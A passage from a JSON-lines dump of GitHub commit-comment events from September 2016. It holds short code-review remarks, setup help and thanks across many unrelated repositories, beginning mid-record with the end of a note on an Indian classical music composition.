Thaat_\r\n\r\n\r\n---\r\n\r\n#### 6: Link to the video: [here](https://www.youtube.com/watch?v=4QVe9SzkVfg)\r\n\r\nThis composition is **Anup Jalota's composition**.\r\n\r\nInstruments: **Tabla**, **Sitar**, **Manjeera**, **Flute**\r\n\r\nThis is mostly a composition without much variation, the same kind of swara, rhythm and gati follows throughout.\r\n\r\nThe lyrics are from Ramayan Manka 108\r\n\r\nGati: **4**\r\n\r\n\r\n---\r\n\r\n\r\n## \r\n\r\n\r\n\r\n\r\nReference (for thaat and the comprising notes, page 14): http://www.ragatracks.com/books/sargam_4466_demo.pdf"}},"created_at":"2016-09-18T23:53:20Z"}
{"id":"4580873938","type":"CommitCommentEvent","actor":{"login":"Croydon"},"repo":{"name":"inexor-game/audioaugust"},"payload":{"comment":{"id":19072662,"position":null,"line":null,"path":null,"commit_id":"78d86ed8ae41469082cf0882c08ede93dbe27109","created_at":"2016-09-18T23:53:44Z","updated_at":"2016-09-18T23:53:44Z","body":"Awesome!"}},"created_at":"2016-09-18T23:53:44Z"}
{"id":"4580879796","type":"CommitCommentEvent","actor":{"login":"JKalash"},"repo":{"name":"geektimecoil/react-native-onesignal"},"payload":{"comment":{"id":19072668,"position":5,"line":4,"path":"ios/RCTOneSignal/RCTOneSignal.h","commit_id":"1566c9033f5e4cdaa765303e7ac6fc7c9146218a","created_at":"2016-09-18T23:58:24Z","updated_at":"2016-09-18T23:58:24Z","body":"@avishayil This class is already inheriting from RCTEventEmitter, thus also inherits to protocol adoption since RCTEvenEmitter."}},"created_at":"2016-09-18T23:58:24Z"}
{"id":"4580880778","type":"CommitCommentEvent","actor":{"login":"awolden"},"repo":{"name":"awolden/brakes"},"payload":{"comment":{"id":19072670,"position":null,"line":null,"path":null,"commit_id":"4b5d86ef1e247102f615c060ff4e610dc46d7e32","created_at":"2016-09-18T23:59:08Z","updated_at":"2016-09-18T23:59:08Z","body":"The latest eslint isn't working with code climate, and travis-ci should prevent any eslint errors from showing up in the main branch."}},"created_at":"2016-09-18T23:59:08Z"}
{"id":"4580881052","type":"CommitCommentEvent","actor":{"login":"kleinee"},"repo":{"name":"forrestfiller/jns"},"payload":{"comment":{"id":19072671,"position":null,"line":null,"path":null,"commit_id":"e600474fd713e30cf140b2c49b44c673629326df","created_at":"2016-09-18T23:59:22Z","updated_at":"2016-09-18T23:59:22Z","body":"I cannot tell you what went wrong with permissions on your system. sudo cd does not work on any UNIX system.\n\nTry sudo -i to give yourself root permissions and then go Into the directory with cd /home/ins/.jupyter/  Edit the configuration file,  save it, leave the editor and then type exit. \n\n\n"}},"created_at":"2016-09-18T23:59:22Z"}
{"id":"4580881122","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Vidigan/EDL"},"payload":{"comment":{"id":19072672,"position":null,"line":null,"path":null,"commit_id":"565496e79809b0c6eae83bc1c9107e834d82bd4e","created_at":"2016-09-18T23:59:25Z","updated_at":"2016-09-18T23:59:25Z","body":"Desculpe Luca, me perdi e não respondi essa mensagem. Sim, você pode. Recomendo para melhorar um pouco a sua nota nesse trabalho."}},"created_at":"2016-09-18T23:59:25Z"}
{"id":"4580881346","type":"CommitCommentEvent","actor":{"login":"JKalash"},"repo":{"name":"geektimecoil/react-native-onesignal"},"payload":{"comment":{"id":19072674,"position":17,"line":22,"path":"ios/RCTOneSignal/RCTOneSignal.m","commit_id":"1566c9033f5e4cdaa765303e7ac6fc7c9146218a","created_at":"2016-09-18T23:59:35Z","updated_at":"2016-09-18T23:59:35Z","body":"Do not synthesize any bridge here. Should use `RCTEventEmitter`'s bridge."}},"created_at":"2016-09-18T23:59:35Z"}
{"id":"4579108091","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19068657,"position":21,"line":45,"path":"components/checkbox/Group.tsx","commit_id":"af7635a73c1deedb1b746d3b60423906f2df6e49","created_at":"2016-09-18T03:01:40Z","updated_at":"2016-09-18T03:01:40Z","body":"多了一个空格。"}},"created_at":"2016-09-18T03:01:40Z"}
{"id":"4579112820","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mjjohns1/dsp"},"payload":{"comment":{"id":19068666,"position":null,"line":null,"path":null,"commit_id":"93907451327ab3fd3da1a0712bf3d796a705f7c8","created_at":"2016-09-18T03:04:34Z","updated_at":"2016-09-18T03:04:34Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mjjohns1 \r\n\r\nGreat work with advanced Python!\r\n\r\n👍 \r\n"}},"created_at":"2016-09-18T03:04:34Z"}
{"id":"4579113481","type":"CommitCommentEvent","actor":{"login":"kleinee"},"repo":{"name":"forrestfiller/jns"},"payload":{"comment":{"id":19068670,"position":null,"line":null,"path":null,"commit_id":"e600474fd713e30cf140b2c49b44c673629326df","created_at":"2016-09-18T03:05:06Z","updated_at":"2016-09-18T03:05:06Z","body":"* the pi needs a fixed IP address - I achieved this by fixing the address lease on my router\n* when you start the server from the command line one of the messages states: The Jupyter Notebook is running at http://xxx.xxx.xxx.xxx:9090\n* is xxx.xxx.xxx.xxx the IP address of your Pi? If not, stop the server and edit jupyter_notebook_config.py in /home/jns/.jupyter (note the . as the directory is hidden)\n* look for the row that states c.NotebookApp.ip =  and edit the IP address to match the address of your Pi. \n* save the file and restart the server\n* you should be able to access  the server via xxx.xxx.xxx.xxx:9090 where xxx is the correct IP address\n\n\n> On Sep 18, 2016, at 8:32 AM, Forrest Filler <notifications@github.com> wrote:\n> \n> @kleinee <https://github.com/kleinee> not yet! Have you tried it? It took a few hours to install, however I'm struggling to be able to access the jns from another computer. I'll let you know when i figure it out. Good luck!\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/forrestfiller/jns/commit/e600474fd713e30cf140b2c49b44c673629326df#commitcomment-19068336>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AHvj4bPZpiRx9lcDAKos_GpQgCdUcPvBks5qrJSqgaJpZM4J-vAF>.\n> \n\n"}},"created_at":"2016-09-18T03:05:06Z"}
{"id":"4579115286","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/pd"},"payload":{"comment":{"id":19068676,"position":null,"line":null,"path":null,"commit_id":"7c531cbbcddf8edb82aa94a488652c0e2cba401d","created_at":"2016-09-18T03:06:25Z","updated_at":"2016-09-18T03:06:25Z","body":"LGTM"}},"created_at":"2016-09-18T03:06:25Z"}
{"id":"4579115624","type":"CommitCommentEvent","actor":{"login":"sp55"},"repo":{"name":"MakeZL/ZLPhotoLib"},"payload":{"comment":{"id":19068677,"position":null,"line":null,"path":null,"commit_id":"3fa87c84a4bd3ae81cecbd1123c61d154f135ce0","created_at":"2016-09-18T03:06:40Z","updated_at":"2016-09-18T03:06:40Z","body":"哥们，你的这个库是不是不支持iOS10了，你在info.plist里面加了那两个Privete的方法之后还有问题   ,上传图片和访问相机会出现崩溃的情况。。。"}},"created_at":"2016-09-18T03:06:40Z"}
{"id":"4579117356","type":"CommitCommentEvent","actor":{"login":"BigBagFind"},"repo":{"name":"BigBagFind/TggTagView"},"payload":{"comment":{"id":19068683,"position":2,"line":2,"path":"README.md","commit_id":"14abf89c7ec61e0c4645f8f59280a8f29fea9668","created_at":"2016-09-18T03:07:57Z","updated_at":"2016-09-18T03:07:57Z","body":"利用UICollectionViewFlowLayout计算文字宽度实现标签视图换行，如果装不下下一个标签则自动换行"}},"created_at":"2016-09-18T03:07:57Z"}
{"id":"4579117685","type":"CommitCommentEvent","actor":{"login":"huynh-chi-hai"},"repo":{"name":"huynh-chi-hai/haihuynh"},"payload":{"comment":{"id":19068684,"position":1,"line":1,"path":"params.json","commit_id":"e204a226134a5264b584a860e5911005a7d2e83d","created_at":"2016-09-18T03:08:12Z","updated_at":"2016-09-18T03:08:12Z","body":"[ http://www.youtube.com/c/haihuynhchi \r\n\r\n](url)"}},"created_at":"2016-09-18T03:08:12Z"}
{"id":"4579118066","type":"CommitCommentEvent","actor":{"login":"drivfe"},"repo":{"name":"d4rken/reddit-android-appstore"},"payload":{"comment":{"id":19068686,"position":52,"line":114,"path":"app/src/main/java/subreddit/android/appstore/screens/navigation/NavigationFragment.java","commit_id":"a97407f1934fe224b4c287b6ddb4ec75224b6842","created_at":"2016-09-18T03:08:34Z","updated_at":"2016-09-18T03:08:34Z","body":"Needs to be public or package private"}},"created_at":"2016-09-18T03:08:34Z"}
{"id":"4579118075","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mjjohns1/dsp"},"payload":{"comment":{"id":19068687,"position":null,"line":null,"path":null,"commit_id":"33746f3d03ed0e3de235acc8413e88ac9b36b1c0","created_at":"2016-09-18T03:08:34Z","updated_at":"2016-09-18T03:08:34Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mjjohns1 \r\n\r\nGreat work on linear algebra!\r\n\r\n👍 "}},"created_at":"2016-09-18T03:08:34Z"}
{"id":"4579121792","type":"CommitCommentEvent","actor":{"login":"zjckobe24"},"repo":{"name":"zjckobe24/theTaken"},"payload":{"comment":{"id":19068700,"position":null,"line":null,"path":null,"commit_id":"80c999bd3ddb8d1720701a61fc9419c5bb340295","created_at":"2016-09-18T03:11:25Z","updated_at":"2016-09-18T03:11:25Z","body":"test"}},"created_at":"2016-09-18T03:11:25Z"}
{"id":"4579123838","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068708,"position":null,"line":null,"path":null,"commit_id":"f20f5f6850cd46f05b648bb63369f914c0b34616","created_at":"2016-09-18T03:12:58Z","updated_at":"2016-09-18T03:12:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kwds5ukC&#x2F;49-vector-math\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Vector Math</a>"}},"created_at":"2016-09-18T03:12:58Z"}
{"id":"4579124210","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068709,"position":null,"line":null,"path":null,"commit_id":"dc0170333168e99a72f05b2e5b1c105b4b4f4f1a","created_at":"2016-09-18T03:13:17Z","updated_at":"2016-09-18T03:13:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kwds5ukC&#x2F;49-vector-math\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Vector Math</a>"}},"created_at":"2016-09-18T03:13:17Z"}
{"id":"4579124402","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068710,"position":null,"line":null,"path":null,"commit_id":"12b19c117bc61623191869ea40868b8d7f39873c","created_at":"2016-09-18T03:13:27Z","updated_at":"2016-09-18T03:13:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kwds5ukC&#x2F;49-vector-math\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Vector Math</a>"}},"created_at":"2016-09-18T03:13:27Z"}
{"id":"4579124891","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068715,"position":null,"line":null,"path":null,"commit_id":"f67b9564771fd763964c6756480991379d0fd600","created_at":"2016-09-18T03:13:50Z","updated_at":"2016-09-18T03:13:50Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kwds5ukC&#x2F;49-vector-math\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Vector Math</a>"}},"created_at":"2016-09-18T03:13:50Z"}
{"id":"4579125451","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19068717,"position":20,"line":94,"path":"lilac","commit_id":"02ab182693a8de97419366b8ffb328c1792432ff","created_at":"2016-09-18T03:14:16Z","updated_at":"2016-09-18T03:14:16Z","body":"是没测试过。。\r\n文档中说SMTP()参数中指定host时自动调用，我记得是这样。。"}},"created_at":"2016-09-18T03:14:16Z"}
{"id":"4579125589","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19068718,"position":20,"line":20,"path":"App Prototypes/Test_004_QRScanner/Test_004_QRScanner/Test_004_QRScanner/Assets.xcassets/profile_round.imageset/Contents.json","commit_id":"10d925d2088177b9153aa695d938669b9c602e03","created_at":"2016-09-18T03:14:23Z","updated_at":"2016-09-18T03:14:23Z","body":"Who the hell is that? Lol"}},"created_at":"2016-09-18T03:14:23Z"}
{"id":"4579127675","type":"CommitCommentEvent","actor":{"login":"stevemao"},"repo":{"name":"you-dont-need/You-Dont-Need-GUI"},"payload":{"comment":{"id":19068724,"position":null,"line":null,"path":null,"commit_id":"aec6ae1720a886ca583714eac276662e5054b3b7","created_at":"2016-09-18T03:15:58Z","updated_at":"2016-09-18T03:15:58Z","body":"👍 🎉 "}},"created_at":"2016-09-18T03:15:58Z"}
{"id":"4579128027","type":"CommitCommentEvent","actor":{"login":"nyczducky"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19068726,"position":null,"line":null,"path":null,"commit_id":"2716bc7562d4cf208a7a0d493a05ad828dda67d8","created_at":"2016-09-18T03:16:14Z","updated_at":"2016-09-18T03:16:14Z","body":"For some reason, # MESSAGE isn't working anymore."}},"created_at":"2016-09-18T03:16:14Z"}
{"id":"4579128877","type":"CommitCommentEvent","actor":{"login":"s8321414"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":19068728,"position":null,"line":null,"path":null,"commit_id":"8db94896301ab97b201374572c7e0b3f98d07ccb","created_at":"2016-09-18T03:16:56Z","updated_at":"2016-09-18T03:16:56Z","body":"I can't even finish my translation :sweat_smile: "}},"created_at":"2016-09-18T03:16:56Z"}
{"id":"4579129555","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19068731,"position":null,"line":null,"path":null,"commit_id":"2716bc7562d4cf208a7a0d493a05ad828dda67d8","created_at":"2016-09-18T03:17:29Z","updated_at":"2016-09-18T03:17:29Z","body":"Working for me I've used it like 6 times today."}},"created_at":"2016-09-18T03:17:29Z"}
{"id":"4579129700","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19068733,"position":32,"line":32,"path":"App Prototypes/Test_004_QRScanner/Test_004_QRScanner/Test_004_QRScanner/CircleTransition.swift","commit_id":"10d925d2088177b9153aa695d938669b9c602e03","created_at":"2016-09-18T03:17:35Z","updated_at":"2016-09-18T03:17:35Z","body":"What's the point of this extension?"}},"created_at":"2016-09-18T03:17:35Z"}
{"id":"4579129701","type":"CommitCommentEvent","actor":{"login":"kkHAIKE"},"repo":{"name":"tttggg2012/fake115"},"payload":{"comment":{"id":19068732,"position":null,"line":null,"path":null,"commit_id":"13ab889ce0bc2b0320a04e571c64dfa065ecc446","created_at":"2016-09-18T03:17:35Z","updated_at":"2016-09-18T03:17:35Z","body":"咋不提issue呢。。"}},"created_at":"2016-09-18T03:17:35Z"}
{"id":"4579132659","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"neobuddy89/shamu"},"payload":{"comment":{"id":19068741,"position":null,"line":null,"path":null,"commit_id":"8bf5c79b7e9c05e7903ead130d13bc6ccf308df4","created_at":"2016-09-18T03:19:34Z","updated_at":"2016-09-18T03:19:34Z","body":"nope.\r\nYou get it because you already define function cpufreq_quick_get_util in include/linux/cpufreq.h"}},"created_at":"2016-09-18T03:19:34Z"}
{"id":"4579132881","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19068743,"position":34,"line":34,"path":"App Prototypes/Test_004_QRScanner/Test_004_QRScanner/Test_004_QRScanner/SWRevealViewController.m","commit_id":"10d925d2088177b9153aa695d938669b9c602e03","created_at":"2016-09-18T03:19:43Z","updated_at":"2016-09-18T03:19:43Z","body":"Holy crap please tell me you didn't write all of this!"}},"created_at":"2016-09-18T03:19:43Z"}
{"id":"4579135115","type":"CommitCommentEvent","actor":{"login":"simonbates"},"repo":{"name":"simonbates/procdraw"},"payload":{"comment":{"id":19068746,"position":null,"line":null,"path":null,"commit_id":"f25bd7415b94e6cdca1ef4cacbc9d0599caa193a","created_at":"2016-09-18T03:21:29Z","updated_at":"2016-09-18T03:21:29Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;sjruMcKr&#x2F;1-convert-tests-to-google-test\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Convert tests to Google Test</a>"}},"created_at":"2016-09-18T03:21:29Z"}
{"id":"4579135289","type":"CommitCommentEvent","actor":{"login":"basisibcs"},"repo":{"name":"basisibcs/CS8-9-10"},"payload":{"comment":{"id":19068747,"position":null,"line":null,"path":null,"commit_id":"d0a06e5b736d5a7cd7f0056e70bdce49c1f3ccf9","created_at":"2016-09-18T03:21:38Z","updated_at":"2016-09-18T03:21:38Z","body":"Should say \"not\" instead of now."}},"created_at":"2016-09-18T03:21:38Z"}
{"id":"4579135309","type":"CommitCommentEvent","actor":{"login":"simonbates"},"repo":{"name":"simonbates/procdraw"},"payload":{"comment":{"id":19068748,"position":null,"line":null,"path":null,"commit_id":"e1194df8a6b2ebbe3cc6361840a40fa7f58fd596","created_at":"2016-09-18T03:21:39Z","updated_at":"2016-09-18T03:21:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;sjruMcKr&#x2F;1-convert-tests-to-google-test\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Convert tests to Google Test</a>"}},"created_at":"2016-09-18T03:21:39Z"}
{"id":"4579138538","type":"CommitCommentEvent","actor":{"login":"frap129"},"repo":{"name":"frap129/angler"},"payload":{"comment":{"id":19068757,"position":null,"line":null,"path":null,"commit_id":"9ec8b402ef341ee877e6334ff4495d1996e4c835","created_at":"2016-09-18T03:24:19Z","updated_at":"2016-09-18T03:24:19Z","body":"Yeah, its really usefull so you dont have to keep adding \"    write \" to the begining of every line"}},"created_at":"2016-09-18T03:24:19Z"}
{"id":"4579138854","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"amardeep434/Guides"},"payload":{"comment":{"id":19068759,"position":null,"line":null,"path":null,"commit_id":"73fdfc4b398e5a6e2b2cd40e46b7bde612288bb9","created_at":"2016-09-18T03:24:33Z","updated_at":"2016-09-18T03:24:33Z","body":"<del> arm-eabi-5.2 </del> it has been replace by arm-eabi-5.3\r\n<del> arm-linux-androideabi-5.2</del> has been replace by arm-linux-androideabi-5.3 \r\n"}},"created_at":"2016-09-18T03:24:33Z"}
{"id":"4579140425","type":"CommitCommentEvent","actor":{"login":"jjsoviet"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19068766,"position":32,"line":32,"path":"App Prototypes/Test_004_QRScanner/Test_004_QRScanner/Test_004_QRScanner/CircleTransition.swift","commit_id":"10d925d2088177b9153aa695d938669b9c602e03","created_at":"2016-09-18T03:25:57Z","updated_at":"2016-09-18T03:25:57Z","body":"It's the extension for the circular transition, it's not implemented but I'll use it in a menu button"}},"created_at":"2016-09-18T03:25:57Z"}
{"id":"4579140670","type":"CommitCommentEvent","actor":{"login":"lsnow2017"},"repo":{"name":"jamrizzi/deskterm"},"payload":{"comment":{"id":19068767,"position":null,"line":null,"path":null,"commit_id":"e9c8347a16497b44e9a9428ad15441a5539bd8d7","created_at":"2016-09-18T03:26:10Z","updated_at":"2016-09-18T03:26:10Z","body":"Hi thank you for helping, I'm running Ubuntu 16.04.1 LTS 64-bit with the latest version of gnome.\r\nThe terminal starts up but it is not really embedded, meaning I can still move it around and it really just looks identical to a normal terminal window with the exception that the File, Edit, View etc bar is gone. Also there were two windows appearing for whatever reason, and in the .profile file you told me about the lines you told me to delete were there twice so perhaps that is why.\r\nThanks again"}},"created_at":"2016-09-18T03:26:10Z"}
{"id":"4579140845","type":"CommitCommentEvent","actor":{"login":"jemmilam"},"repo":{"name":"jemmilam/Pokemon-Unity-Essentials-2D"},"payload":{"comment":{"id":19068768,"position":null,"line":null,"path":null,"commit_id":"3068afc05cf78c712b0b9561514d8e94f28f6048","created_at":"2016-09-18T03:26:17Z","updated_at":"2016-09-18T03:26:17Z","body":"Messed up again, Ignore this commit"}},"created_at":"2016-09-18T03:26:17Z"}
{"id":"4579141375","type":"CommitCommentEvent","actor":{"login":"Adam1609"},"repo":{"name":"ArchRPG/ARCore"},"payload":{"comment":{"id":19068771,"position":null,"line":null,"path":null,"commit_id":"2f03af05dadf4c8ad3875401b458df9166c265e5","created_at":"2016-09-18T03:26:44Z","updated_at":"2016-09-18T03:26:44Z","body":"I have an idea on this, should you add auto clearlagg like PC, I have code here"}},"created_at":"2016-09-18T03:26:44Z"}
{"id":"4579141681","type":"CommitCommentEvent","actor":{"login":"jemmilam"},"repo":{"name":"jemmilam/Pokemon-Unity-Essentials-2D"},"payload":{"comment":{"id":19068772,"position":null,"line":null,"path":null,"commit_id":"758d1be3f6f8a05362188dcb2f389273b8c30f02","created_at":"2016-09-18T03:27:00Z","updated_at":"2016-09-18T03:27:00Z","body":"Messed up removing folders, ignore that portion."}},"created_at":"2016-09-18T03:27:00Z"}
{"id":"4579143406","type":"CommitCommentEvent","actor":{"login":"matiasmac"},"repo":{"name":"facebook/facebook-android-sdk"},"payload":{"comment":{"id":19068776,"position":72,"line":72,"path":"tests/src/com/facebook/android/tests/Tests.java","commit_id":"b7064910e2c09f84db46cfec162f8939496be777","created_at":"2016-09-18T03:28:24Z","updated_at":"2016-09-18T03:28:24Z","body":"+                         APP_ID , PERMISOS , nueva  TestLoginListener ());\r\n"}},"created_at":"2016-09-18T03:28:24Z"}
{"id":"4579144165","type":"CommitCommentEvent","actor":{"login":"yidexie"},"repo":{"name":"yidexie/WebDemo1"},"payload":{"comment":{"id":19068777,"position":9,"line":9,"path":"WebDemo1/src/tmp2.java","commit_id":"a80f8d2a0c3fc05e7fabda7d3dfee310441390ab","created_at":"2016-09-18T03:29:04Z","updated_at":"2016-09-18T03:29:04Z","body":"use drag, change all????"}},"created_at":"2016-09-18T03:29:04Z"}
{"id":"4579144652","type":"CommitCommentEvent","actor":{"login":"kenshinx"},"repo":{"name":"kenshinx/godns"},"payload":{"comment":{"id":19068780,"position":35,"line":83,"path":"hosts.go","commit_id":"8e14764aa715908002a632a60bc4508e0ccefee0","created_at":"2016-09-18T03:29:27Z","updated_at":"2016-09-18T03:29:27Z","body":"\bThanks point out the  improper modifying.\r\nReduce the refresh interval can accelerate Identifying the modifying of host records. However, the refresh interval should be configurable instead of hard coding, i will fix this issue in another single commit."}},"created_at":"2016-09-18T03:29:27Z"}
{"id":"4579144799","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/itop-extensions"},"payload":{"comment":{"id":19068782,"position":null,"line":null,"path":null,"commit_id":"81e06d13cfce941c36021219a544de913e2e8a75","created_at":"2016-09-18T03:29:34Z","updated_at":"2016-09-18T03:29:34Z","body":"fix #4 "}},"created_at":"2016-09-18T03:29:34Z"}
{"id":"4579149786","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/itop-extensions"},"payload":{"comment":{"id":19068795,"position":null,"line":null,"path":null,"commit_id":"a03d14785c0cca7505c564631c98c340b26def84","created_at":"2016-09-18T03:33:19Z","updated_at":"2016-09-18T03:33:19Z","body":"fix #23 "}},"created_at":"2016-09-18T03:33:19Z"}
{"id":"4579152767","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068798,"position":null,"line":null,"path":null,"commit_id":"4cb76f369a40c7ec169310da1ee32876072ffd37","created_at":"2016-09-18T03:35:50Z","updated_at":"2016-09-18T03:35:50Z","body":"**Warning: API change**"}},"created_at":"2016-09-18T03:35:50Z"}
{"id":"4579155806","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068805,"position":12,"line":1561,"path":"src/pocketmine/Player.php","commit_id":"15b9578245b691844a4e1227be2c36c68d26b504","created_at":"2016-09-18T03:38:23Z","updated_at":"2016-09-18T03:38:23Z","body":"Are you sure this is different? `$eyePos` is equal to `$this->getPosition()` and equal to `$this` as a `Vector3`. From line 1555, `$eyePos` does not change the `x` and `z` of the vector."}},"created_at":"2016-09-18T03:38:23Z"}
{"id":"4579156251","type":"CommitCommentEvent","actor":{"login":"palmm"},"repo":{"name":"zackharley/groundhogdai"},"payload":{"comment":{"id":19068808,"position":15,"line":25,"path":"src/views/Main/Container.js","commit_id":"069d614543835cf24de80e7c17659ed022e43a2d","created_at":"2016-09-18T03:38:51Z","updated_at":"2016-09-18T03:38:51Z","body":"FUUUUUUUUUUCK"}},"created_at":"2016-09-18T03:38:51Z"}
{"id":"4579157574","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068812,"position":51,"line":1622,"path":"src/pocketmine/Player.php","commit_id":"4cb76f369a40c7ec169310da1ee32876072ffd37","created_at":"2016-09-18T03:40:05Z","updated_at":"2016-09-18T03:40:05Z","body":"Please look at http://php.net/operators.precedence\r\nThe precedence of `(bool)` is much higher than the precedence of `&`.\r\nYou need add parentheses."}},"created_at":"2016-09-18T03:40:05Z"}
{"id":"4579161239","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068828,"position":null,"line":null,"path":null,"commit_id":"765bd5ced7973e3144f34a8f18f317e7068cc470","created_at":"2016-09-18T03:43:18Z","updated_at":"2016-09-18T03:43:18Z","body":":+1:"}},"created_at":"2016-09-18T03:43:18Z"}
{"id":"4579161960","type":"CommitCommentEvent","actor":{"login":"NickleDave"},"repo":{"name":"NickleDave/hybrid-deep-finch"},"payload":{"comment":{"id":19068830,"position":null,"line":null,"path":null,"commit_id":"d455e0a17f71f731baab85733f7d2222439a270d","created_at":"2016-09-18T03:43:51Z","updated_at":"2016-09-18T03:43:51Z","body":"Just need to figure out how to save scalers from scikit-learn (if I'm not doing that already in shelve) and then apply correct scaler during classify"}},"created_at":"2016-09-18T03:43:51Z"}
{"id":"4579162516","type":"CommitCommentEvent","actor":{"login":"auboliuxin"},"repo":{"name":"ros/rosdistro"},"payload":{"comment":{"id":19068834,"position":null,"line":null,"path":null,"commit_id":"144c7fcfbdebdb49afc0783b6ebea1c693fc372a","created_at":"2016-09-18T03:44:19Z","updated_at":"2016-09-18T03:44:19Z","body":"add aubo_robot to documentation index for distro"}},"created_at":"2016-09-18T03:44:19Z"}
{"id":"4579163256","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068835,"position":null,"line":null,"path":null,"commit_id":"daf56aa8fe08caa4e4e69f604f5e504daf37086f","created_at":"2016-09-18T03:45:02Z","updated_at":"2016-09-18T03:45:02Z","body":"Really?"}},"created_at":"2016-09-18T03:45:02Z"}
{"id":"4579163910","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068839,"position":24,"line":3355,"path":"src/pocketmine/Player.php","commit_id":"b8fbc11048926b6c85a0025c28f0ac3e1b7c2b48","created_at":"2016-09-18T03:45:36Z","updated_at":"2016-09-18T03:45:36Z","body":":+1:"}},"created_at":"2016-09-18T03:45:36Z"}
{"id":"4579165768","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068845,"position":6,"line":78,"path":"src/pocketmine/PocketMine.php","commit_id":"df4c3ec4a68cd6705dd0dd66c0f0e6cc04ff295a","created_at":"2016-09-18T03:47:11Z","updated_at":"2016-09-18T03:47:11Z","body":"But the APK declares it as `0.15.4.0` :cry: "}},"created_at":"2016-09-18T03:47:11Z"}
{"id":"4579166810","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"iTXTech/PocketMine-MP"},"payload":{"comment":{"id":19068848,"position":null,"line":null,"path":null,"commit_id":"8e9a078ff9f45f53b2b77494eef76ebebd8501c1","created_at":"2016-09-18T03:48:02Z","updated_at":"2016-09-18T03:48:02Z","body":"**Warning: API change: Removed `Utils::getRandomBytes()`"}},"created_at":"2016-09-18T03:48:02Z"}
